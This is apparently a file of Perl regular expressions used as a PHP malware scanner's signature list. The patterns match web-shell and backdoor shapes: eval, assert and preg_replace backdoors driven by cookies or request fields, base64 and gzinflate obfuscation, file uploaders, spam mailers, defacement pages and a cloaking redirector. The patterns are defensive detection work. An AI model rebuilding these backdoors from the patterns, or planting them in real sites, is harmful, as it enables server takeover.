qr/<\?php\s+if\(isset\(\$\_COOKIE\[\".+?\"\]\)\)\/\*.+?\*\/\{\$\_COOKIE\[\".+?\"\]\(\$\_COOKIE\[\".+?\"\]\)\;\/\*.+?\*\/exit\;\/\*.+?\*\/\}\/\*.+?\*\//is,
qr/<\?php\s+set\_time\_limit\(0\)\;.+?<H1><center>config\s+root\s+man<\/center><\/H1>.+?return\s+\$info\;\s+\}\s+\?>/is,
qr/<\?php\s+\/\*.+?\*\/if\/\*.+?\*\/\(isset\(\$\{\"\_REQ\"\.\"UEST\"\}\[\'.+?\'\]\)\)\{\/\*.+?\*\/\$\w\/\*.+?\*\/\=\/\*.+?\*\/\"preg\_replace\"\;\$\w\(\'\/\/e\'\,\$\{\"\_REQ\"\.\"UEST\"\}\[\'.+?\'\]\,\'\'\)\;\/\*.+?\*\/exit\;\/\*.+?\*\/\}/is,
qr/<\?php\s+echo\s+\'([A-z0-9]{1,20})\'\;\s+preg\_replace\(\"\\x.+?\\x3B\"\,\"\\x2E\"\)\;\s+\?>/is,
qr/<\?php\s+if\s+\(\!defined\(\'ALREADY\_RUN\_.+?define\(\'ALREADY\_RUN\_.+?\$([A-z0-9]{1,20})\s+\=\s+Array\(.+?eval\/\*([A-z0-9]{1,20})\*\/\(([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\)\)\;\s+\}.+?\Z/is,
qr/<\?php\s+\/\/\#\#\#\=\=\=\=\#\#\#\s+\@error\_reporting\(E\_ALL\)\;.+?\@assert\_options\(ASSERT\_QUIET\_EVAL.+?\/\/\#\#\#\=\=\=\=\#\#\#\s+\?>/is,
qr/<\?php.+?\/\/\#\#\#\=\=\=\=\#\#\#\s+\@error\_reporting\(E\_ALL\)\;.+?\@assert\_options\(ASSERT\_QUIET\_EVAL.+?\/\/\#\#\#\=\=\=\=\#\#\#/is,
qr/<\?php\s+extract\(\$\_COOKIE\)\;\@\$F\&\&\(\@\$F\(\$A\,\$B\)\|\|\@\$W\(\$X\(\$Y\,\$Z\)\)\)\;/is,
qr/<\?php\s+eval\(\"\\n\\\$([A-z0-9]{1,20})\s+\=\s+intval\(\_\_LINE\_\_\)\s+\*\s+337\;\"\)\;\s+\$a\s+\=.+?\$a\s+\=\s+str\_replace\(\$([A-z0-9]{1,20})\,\s+\"E\"\,\s+\$a\)\;\s+eval\s+\(gzinflate\(base64\_decode\(\$a\)\)\)\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?function\s+([A-z0-9]{1,20})\(\$\w\)\{return\s+chr\(ord\(\$\w\)\-1\)\;\}\s+\@error.+?\$([A-z0-9]{1,20})\s+\=\s+implode\(array\_map.+?\)\;\s+\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\-1\;\s+\?>/is,
qr/<\?php\s+if\(md5\(\$\_COOKIE\[\'\_wp\_debugger\'\]\)\=\=\"([A-z0-9]{32})\"\)\{\s+eval\(base64\_decode\(\$\_POST\[\'file\'\]\)\)\;\s+exit\;\s+\}\s+\?>/is,
qr/<\?php\s+if\s+\(isset\(\$\_POST\[\'upload\'\]\)\)\{.+?fwrite\(\$fp\,\s+\$\_POST\[\'uploadfile\'\]\)\;.+?else\s+\{header\(\'Location\:\s+\.\.\/\.\.\/\'\)\;\}\s+\?>/is,
qr/<\?php\s+if\s+\(\(isset\(\$\_POST\[\'to\'\]\)\)\s+AND.+?\$\_POST\[\'headers\'\]\)\)\s+\{echo\s+\'ok\'\;\}.+?else\s+\{\s+header\(\'Location\:\s+\/\'\)\;\s+\}\s+\?>/is,
qr/<\?php\s+\$\w\d\=\$\_REQUEST\[\'sort\'\]\;\$\w\d\=\'\'\;\$\w\d\=\".+?\"\;\$\w\d\=array\(.+?\)\;foreach\(\$\w\d\s+as\s+\$\w\d\)\{\$\w\d\.\=\$\w\d\[\$\w\d\]\;\}\$\w\d\=strrev\(\"noi\"\.\"tcnuf\"\.\"\_eta\"\.\"erc\"\)\;\$\w\d\=\$\w\d\(\"\"\,\$\w\d\(\$\w\d\)\)\;\$\w\d\(\)\;\?>/is,
qr/<\?php\s+eval\(\"\?>\"\s+\.\s+base64\_decode\(\".+?\)\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+([A-z0-9]{1,20})\;\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\=Array\(\)\;global\$([A-z0-9]{1,20})\;\$([A-z0-9]{1,20})\=\$GLOBALS\;\$\{.+?\{eval\/\*([A-z0-9]{1,20})\*\/\(\$([A-z0-9]{1,20})\[\d\]\(\$([A-z0-9]{1,20})\[\d\]\)\)\;exit\(\)\;\}\}\}\s+\?>/is,
qr/<\?php\s+header\(\"Cache\-Control\:\s+tect\"\)\;\s+\@error\_reporting\(0\)\;\s+\@ini\_set\(\"display\_errors\"\,0\)\;\s+\@ini\_set\(\"log\_errors\"\,0\)\;\s+\@ini\_set\(\"error\_log\"\,0\)\;\s+if\s+\(isset\(\$\_POST\[\"x\"\]\)\)\s+\{\s+eval\(\$\_POST\[\"x\"\]\)\;\s+\}\s+\?>/is,
qr/<\?php.+?\$data\s+\=\s+file\_get\_contents\(\'php:\/\/input\'\)\;.+?\$data\s+\=\s+base64\_decode\(\$data\)\;.+?if\s+\(\$ok\)\s+\{\s+d\(\'ok\'\)\;\s+\}\s+else\s+\{\s+d\(\'bad\:\'\.\$fname\.\'\|\'\.\_\_DIR\_\_\)\;\s+\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'b\'\.\'a\'\.\'s\'\.\'e64\_deco\'\.\'de\'\;\s+\@eval\(\$([A-z0-9]{1,20})\(.+?\)\)\;/is,
qr/<\?php\s+\$alphabet\s+\=\s+\"\..+?\$string\s+\=\s+\".+?\$array\_name\s+\=\s+\"\"\;\s+\$ar\s+\=\s+array\(.+?foreach\(\$ar\s+as\s+\$t\)\{\s+\$array\_name\s+\.\=\s+\$alphabet\[\$t\]\;\s+\}\s+\$a\s+\=\s+strrev\(\"noi\"\.\"tcnuf\"\.\"\_eta\"\.\"erc\"\)\;\s+\$f\s+\=\s+\$a\(\"\"\,\s+\$array\_name\(\$string\)\)\;\s+\$f\(\)\;/is,
qr/<\?php\s+if\(isset\(\$\_POST\[\"mailto\"\]\)\)\s+\$MailTo\s+\=\s+base64\_decode\(\$\_POST\[\"mailto\"\]\)\;\s+else.+?echo\s+\"sent\_ok\"\;\s+else\s+echo\s+\"sent\_error\"\;\s+\?>/is,
qr/<script\s+type\=\"text\/javascript\">eval\(function\(p\,a\,c\,k\,e\,r\).+?script\|\|\|\|document\|defer\|google\_analytics\|yandexMetrix.+?start\|http\|window\|11\'\.split\(\'\|\'\)\,0\,\{\}\)\)<\/script>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+([A-z0-9]{1,20})\;\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+Array\(\)\;global\s+\$([A-z0-9]{1,20})\;\$([A-z0-9]{1,20})\s+\=\s+\$GLOBALS\;\$\{.+?\]\)\{eval\/\*([A-z0-9]{1,20})\*\/\(\$([A-z0-9]{1,20})\[\$([A-z0-9]{1,20})\[\'([A-z0-9]{1,20})\'\]\[([A-z0-9]{1,20})\]\]\)\;\}exit\(\)\;\}\s+\?>/is,
qr/<\?php\s+echo\s+([0-9]{1,20})\+([0-9]{1,20})\;\$([A-z0-9]{1,20})\_([A-z0-9]{1,20})\=base64\_decode\(.+?if\(\$\_POST\[base64\_decode\(.+?\)\)\]\[base64\_decode\(.+?\)\.\"\=\"\)\]\)\;\}\;\s+\?>/is,
qr/<html\s+oncontextmenu\=.+?CYBER\_LoW.+?width\=\"1\">\s+<\/html>/is,
qr/<html>\s+<head>.+?SemsexTheBg78.+?frameborder\=\"0\"\s+allowfullscreen>/is,
qr/<\!doctype\s+html>\s+<html>\s+<title>Vespa<\/title>.+?Hacked\s+By\s+Trihash.+?<\/html>/is,
qr/\"><input\s+type\=submit.+?\!function\_exists\(\"posix\_getpwuid\"\).+?<\/marquee><\/div>/is,
qr/<\?php\s+\$db\_\_g\_\=\'base\'\.\(128\/2\)\.\'\_de\'\.\'code\'\;\$db\_\_g\_\=\$db\_\_g\_\(str\_replace\(.+?submit\"value\=\"\&gt\;\"\/><\/form>/is,
qr/<\?php\s+\$\{\"\\x.+?\]\=\"key\"\;\@ini\_set\(.+?\]\}\=\@unserialize\(decode\(get\_params\(\$\{\$\{\"GLO.+?\]\}\;\}\s+\?>/is,
qr/<\?php\s+eval\(gzinflate\(base64\_decode\(.+?\'\)\)\)\;\s+\?>/is,
qr/<\?php\s+eval\(\"\?>\"\.base64\_decode\(\".+?\"\)\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?\;\$([A-z0-9]{1,20})\s+\=\s+Array\(\)\;\$([A-z0-9]{1,20})\[\]\s+\=\s+\$([A-z0-9]{1,20})\[\d\]\.\$([A-z0-9]{1,20})\[\d\d\]\;\$([A-z0-9]{1,20})\[\].+?\;foreach\s+\(\$([A-z0-9]{1,20})\[\d\]\(\$\_COOKIE\,\s+\$\_POST\)\s+as\s+\$([A-z0-9]{1,20}).+?\$([A-z0-9]{1,20})\[\d\]\(\$([A-z0-9]{1,20})\)\)\)\)\;\}/is,
qr/<html><head>.+?\@HACKED\s+By\_BDJ\-007.+?var\s+pesen\=\"BDJ\-007\s+Was\s+Here\s+>\_\*\"\;.+?<\/script>\s+<style>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+([A-z0-9]{1,20})\;\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\=Array\(\)\;global\$([A-z0-9]{1,20})\;\$([A-z0-9]{1,20})\=\$GLOBALS\;\$\{.+?\)\{eval\/\*([A-z0-9]{1,20})\*\/\(\$([A-z0-9]{1,20})\[\$([A-z0-9]{1,20})\[\'([A-z0-9]{1,20})\'\]\[([A-z0-9]{1,20})\]\]\)\;\}exit\(\)\;\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+([A-z0-9]{1,20})\;\s+function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\)\{\$([A-z0-9]{1,20})\s+\=\s+\'\'\;\s+for\(\$i\=0\;\s+\$i\s+<\s+strlen\(\$([A-z0-9]{1,20})\)\;\s+\$i\+\+\)\{\$([A-z0-9]{1,20})\s+\.\=\s+isset\(\$([A-z0-9]{1,20})\[\$([A-z0-9]{1,20})\[\$i\]\]\).+?eval\/\*([A-z0-9]{1,20})\*\/\(([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\)\)\;\?>/is,
qr/include\s+\"\\x.+?eval\(base64\_decode\(.+?file\_get\_contents\(\"index\.htm\"\)\;exit\;\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\'.+?\;\$([A-z0-9]{1,20})\s+\=\s+Array\(\)\;\$([A-z0-9]{1,20})\[\]\s+\=.+?\]\;foreach\s+\(\$([A-z0-9]{1,20})\[\d\]\(\$\_COOKIE\,\s+\$\_POST\).+?\)\{function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\)\{return\s+\$([A-z0-9]{1,20}).+?\{eval\(\$([A-z0-9]{1,20})\[.+?\]\(\$([A-z0-9]{1,20})\)\)\)\)\;\}/is,
qr/<\?php\s+session\_start\(\)\;.+?\#\s+md5\:\s+IndoXploit.+facebookexternalhit.+?\Z/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+([A-z0-9]{1,20})\;\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+Array\(\)\;global\s+\$([A-z0-9]{1,20})\;\$([A-z0-9]{1,20})\s+\=\s+\$GLOBALS\;\$\{.+?\]\)\{eval\/\*([A-z0-9]{1,20})\*\/\(\$([A-z0-9]{1,20})\[\$([A-z0-9]{1,20})\[\'([A-z0-9]{1,20})\'\]\[([A-z0-9]{1,20})\]\]\)\;\}exit\(\)\;\}\s+\?>/is,
qr/<\!DOCTYPE\s+html>.+?<title>PHP\s+sCAn<\/title>.+?\?>\s+<\/html>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=.+?\$\_([A-z0-9]{1,20})\s+\=\s+create\_function\s+\(\'\$([A-z0-9]{1,20})\'\,\s+([A-z0-9]{1,20})\s+\(base64\_decode\s+\(.+?\)\,\s+\$\_COOKIE\s+\[str\_replace\(\'\.\'\,\s+\'\_\'\,\s+\$\_SERVER\[\'HTTP\_HOST\'\]\)\]\)\s+\.\s+\'\;\'\)\;\s+\$\_([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\;\s+function\s+([A-z0-9]{1,20})\s+\(\$([A-z0-9]{1,20})\,\s+\$([A-z0-9]{1,20})\)\s+\{\s+return\s+\$([A-z0-9]{1,20})\s+\^\s+str\_repeat\s+\(\$([A-z0-9]{1,20})\,\s+ceil\s+\(strlen\s+\(\$([A-z0-9]{1,20})\)\s+\/\s+strlen\s+\(\$([A-z0-9]{1,20})\)\)\)\;\s+\}\s+\?>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{die\(pi\(\)\*\d\)\;\}\s+error\_reporting\(0\)\;\s+if\s+\(isset\(\$\_GET\[\"ping\"\]\)\s+and\s+\$\_GET\[\"ping\"\]\s+\=\=\s+\(\"ping\_host\"\)\)\s+\{.+?if\s+\(\$return\s+\=\=\s+true\)\s+\{\s+echo\s+\"true\"\;\s+\}\s+else\s+\{\s+echo\s+\"false\"\;\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[.+?\(\'\/\/e\'\,\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[.+?\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/error\s+page\s+news\s+version\s+\d\.\d\.\d\s+<\?php.+?\$([A-z0-9]{1,20})\s+=\s+str\_replace\(.+?\/\/\$([A-z0-9]{1,20})\(\)\;\s+\?>/is,
qr/<\?php\s+\$\w\_\_\_\w\_\=\'base\'\.\(32\*2\)\.\'\_de\'\.\'code\'\;\$\w\_\_\_\w\_\=\$\w\_\_\_\w\_\(str\_replace\(\"\\n\"\,\s+\'\'.+?value\=\"\&gt\;\"\/><\/form>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_REQ\"\.\"UEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\"preg\_replac\"\.\"e\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\(\'\/\/([A-z0-9]{1,20})\'\,\$\{\"\_REQ\"\.\"UEST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\"assert\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\}\?>/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_R\"\.\"EQ\"\.\"UE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"assert\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\/\*([A-z0-9]{1,20})\*\//is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_REQU\"\.\"EST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"asse\"\.\"rt\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+([A-z0-9]{1,20})\;\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\=Array\(\)\;global\$([A-z0-9]{1,20})\;\$([A-z0-9]{1,20})\=\$GLOBALS\;\$\{.+?\$([A-z0-9]{1,20})\)\;\}\}\s+\?>/is,
qr/<\!\-\-\s+this\_file\_is\_blocked\s+\-\-><\?php\s+error\_reporting\(0\)\;\s+if\s+\(isset\(\$\_GET\[\"ping\"\]\)\s+and\s+\$\_GET\[\"ping\"\]\s+\=\=\s+\(\"ping\_host\"\)\)\s+\{.+?\}\s+else\s+\{\s+echo\s+\"false\"\;\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'ba\'\.\'se64\'\.\'\_\'\.\'d\'\.\'eco\'\.\'d\'\.\'e\'\;\s+\@eval\(\$([A-z0-9]{1,20})\(.+?\.\'.+?\'\.\'.+?\'\)\)\;/is,
qr/<\?php\s+function\s+([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\$([A-z0-9]{1,20})\=\"\"\).+?\)\)\)\;\s+\$([A-z0-9]{1,20})\(\)\;/is,
qr/<\?php\s+\/\/([A-z0-9]{150,}).+?eval\(base64\_decode\(.+?\)\)\;\s+\?>/is,
qr/<\?php\s+if\(isset\(\$\_GET\[\'([A-z0-9]{1,20})\'\]\)\)\{if\(isset\(\$\_FILES\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=getcwd\(\)\.\'\/\'\;\$([A-z0-9]{1,20})\=\$\_FILES\[\'([A-z0-9]{1,20})\'\]\;\@move\_uploaded\_file\(\$([A-z0-9]{1,20})\[\'tmp\_name\'\]\,\s+\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\[\'([A-z0-9]{1,20})\'\]\)\;echo\"Done\:\s+\"\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\[\'([A-z0-9]{1,20})\'\]\;\}else\{\?><form\s+method\=\"POST\"\s+enctype\=\"multipart\/form\-data\"><input\s+type\=\"file\"\s+name\=\"([A-z0-9]{1,20})\"\/><input\s+type\=\"Submit\"\/><\/form><\?php\s+\}\}\s+\?>/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"asse\"\.\"rt\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\/\*([A-z0-9]{1,20})\*\/\"assert\"\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\=\"assert\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\/\*([A-z0-9]{1,20})\*\/\"as\"\.\"se\"\.\"rt\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\/\*([A-z0-9]{1,20})\*\/\}\?>/is,
qr/<\?php\s+if\s+\(isset\(\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"asse\"\.\"rt\"\;\$([A-z0-9]{1,20})\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}/is,
qr/<\?php\s+if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\"preg\_\"\.\"repla\"\.\"ce\"\;\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQUES\"\.\"T\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;exit\;\/\*([A-z0-9]{1,20})\*\/\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{eval\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\"asser\"\.\"t\"\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\(\/\*([A-z0-9]{1,20})\*\/\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_REQUE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\/\*([A-z0-9]{1,20})\*\/\$([A-z0-9]{1,20})\=\"preg\_r\"\.\"eplace\"\;\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQUE\"\.\"ST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;exit\;\}/is,
qr/<\?php\s+if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\=\"as\"\.\"se\"\.\"rt\"\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\/\*([A-z0-9]{1,20})\*\/\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\/\*([A-z0-9]{1,20})\*\/\;exit\;\}\?>/is,
qr/<\?php\s+\$.+?\=str\_replace\(\'\s+\'\,\'\'\,\$.+?for\s+\(\s+\$i\s+\=\s+0\;\s+\$i\s+<\s+strlen\(\s+\$.+?\=\@gzinflate\(strrev\(\$.+?create\_function\(\'\$.+?\)\;\s+\}\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;\s+\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;.+?error\_reporting\(0\)\;.+?\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;\s+\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;.+?\$domain\s+\=\s+\'n\.liveupdates\.host\'\;.+?\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;\s+\$([A-z0-9]{5,})\=\"([A-z0-9]{5,})\"\;.+?if\s+\(preg\_match\(\'\/googlebot\|slurp.+?header\(\'Location\:\s+\'\.\$location\.\'\&\'\.\$([A-z0-9]{1,10})\,\s+TRUE\,\s+302\)\;\s+\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\/\*([A-z0-9]{1,20})\*\/\}\/\*([A-z0-9]{1,20})\*\//is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_REQU\"\.\"EST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\{\$([A-z0-9]{1,20})\=\"preg\_re\"\.\"place\"\;\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQU\"\.\"EST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{\/\*([A-z0-9]{1,20})\*\/eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}\?>/is,
qr/<\?php\s+if\(isset\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\(\$\_COOKIE\[\"([A-z0-9]{1,20})\"\]\)\;\/\*vsql\*\/exit\;\}\/\*([A-z0-9]{1,20})\*\//is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\{eval\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\;exit\;\}\?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/if\/\*([A-z0-9]{1,20})\*\/\(isset\(\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\)\)\/\*([A-z0-9]{1,20})\*\/\{\$([A-z0-9]{1,20})\=\"pre\"\.\"g\_r\"\.\"epl\"\.\"ace\"\;\$([A-z0-9]{1,20})\(\'\/\/e\'\,\$\{\"\_REQUEST\"\}\[\'([A-z0-9]{1,20})\'\]\,\'\'\)\;\/\*([A-z0-9]{1,20})\*\/exit\;\}/is,
